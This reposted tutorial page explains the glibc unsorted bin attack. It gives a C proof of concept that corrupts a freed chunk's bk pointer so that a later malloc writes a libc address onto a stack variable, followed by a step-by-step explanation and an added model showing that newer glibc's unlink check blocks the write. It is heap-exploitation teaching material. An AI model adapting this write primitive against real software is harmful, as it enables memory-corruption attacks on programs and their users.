13.unsorted_bin_attack

Source code

#include <stdio.h>
#include <stdlib.h>

int main(){
    fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
    fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
           "global variable global_max_fast in libc for further fastbin attack\n\n");

    /* The target to be overwritten lives on the stack. */
    unsigned long stack_var=0;
    fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
    fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);

    /* Not a fastbin-sized request, so the chunk lands in the unsorted bin when freed. */
    unsigned long *p=malloc(400);
    fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
    fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with "
           "the first one during the free()\n\n");
    malloc(500);

    free(p);
    /* After free(), p[0] is the chunk's fd and p[1] its bk; both point at the unsorted bin head. */
    fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
           "point to %p\n",(void*)p[1]);

    //------------VULNERABILITY-----------

    /* Point bk 16 bytes below the target, so that the fake chunk's fd field is stack_var itself. */
    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
    fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

    //------------------------------------

    /* Unlinking the chunk executes bck->fd = unsorted_chunks(av), i.e. stack_var = address of the bin head. */
    malloc(400);
    fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
           "rewritten:\n");
    fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

Execution result

First, a variable of type unsigned long (stack_var, referred to as var below) is declared on the stack.

Next, a 400-byte chunk p is allocated from the heap, followed by a 500-byte chunk so that p is not merged with the top chunk when it is freed.

Then p is freed and goes into the unsorted bin.

At this point p's bk value can be seen to be 0x7ffff7dd1b78.

This is changed to the address 16 bytes below var.

In effect this treats the memory around var as a fake chunk.

The 8 bytes occupied by var are the first 8 bytes of that fake chunk's data area (its fd field).

Then another 400 bytes are requested; this allocation is served from the freed chunk p.

As a result, var, which p's bk points to, is overwritten with 0x7ffff7dd1b78 (this value is always main_arena+88).

That is a very large unsigned long value.
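To make the mechanism in the walkthrough concrete from the defender's side, the following added example (written for this page, not code from the original post or from glibc) models the unsorted bin as a circular doubly linked list and replays the corrupted-bk unlink twice: once the way older glibc did it, and once with the back-pointer consistency check that newer glibc releases perform before unlinking. `struct chunk`, `bin_head`, `unsorted_insert`, `unsorted_take` and `target_overwritten` are names of this model, not glibc's.

```c
#include <stddef.h>
#include <stdio.h>

/* Minimal model of the malloc_chunk fields the unsorted bin touches.
 * Constructed for this example; not glibc's own structure. */
struct chunk {
    size_t prev_size, size;
    struct chunk *fd, *bk;
};

/* Stand-in for the unsorted bin head inside main_arena (main_arena+88 above). */
static struct chunk bin_head = { 0, 0, &bin_head, &bin_head };

/* free(): link p at the front of the circular unsorted list. */
static void unsorted_insert(struct chunk *p) {
    struct chunk *bck = &bin_head, *fwd = bck->fd;
    p->fd = fwd; p->bk = bck;
    bck->fd = p; fwd->bk = p;
}

/* malloc(): unlink the last chunk. With check=0 this mirrors the old code,
 * which trusts victim->bk blindly; with check=1 it refuses (returns NULL and
 * writes nothing) unless the neighbours still point back at victim, which is
 * the consistency test newer glibc releases apply before unlinking. */
static struct chunk *unsorted_take(int check) {
    struct chunk *victim = bin_head.bk, *bck = victim->bk;
    if (check && (bck->fd != victim || victim->fd != &bin_head))
        return NULL;
    bin_head.bk = bck;
    bck->fd = &bin_head;   /* the write the attack turns into a primitive */
    return victim;
}

/* Replays the walkthrough in the model. `fake` stands for the 32 bytes at
 * target-16, so its fd field plays the role of the target variable.
 * Returns 1 if the target now holds the bin head address, 0 if untouched. */
int target_overwritten(int check) {
    struct chunk victim = { 0 }, fake = { 0 };
    bin_head.fd = bin_head.bk = &bin_head;      /* fresh arena */
    unsorted_insert(&victim);
    victim.bk = &fake;                          /* emulated bk corruption */
    unsorted_take(check);
    return fake.fd == &bin_head;
}

int main(void) {
    printf("unchecked unlink: target overwritten = %d\n", target_overwritten(0));
    printf("checked unlink:   target overwritten = %d\n", target_overwritten(1));
    return 0;
}
```

The unchecked path reports 1 (the target received the bin head address, just as var received main_arena+88 above), the checked path reports 0 because the corrupted list is rejected before the write happens.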

Reposted from www.cnblogs.com/pfcode/p/10994400.html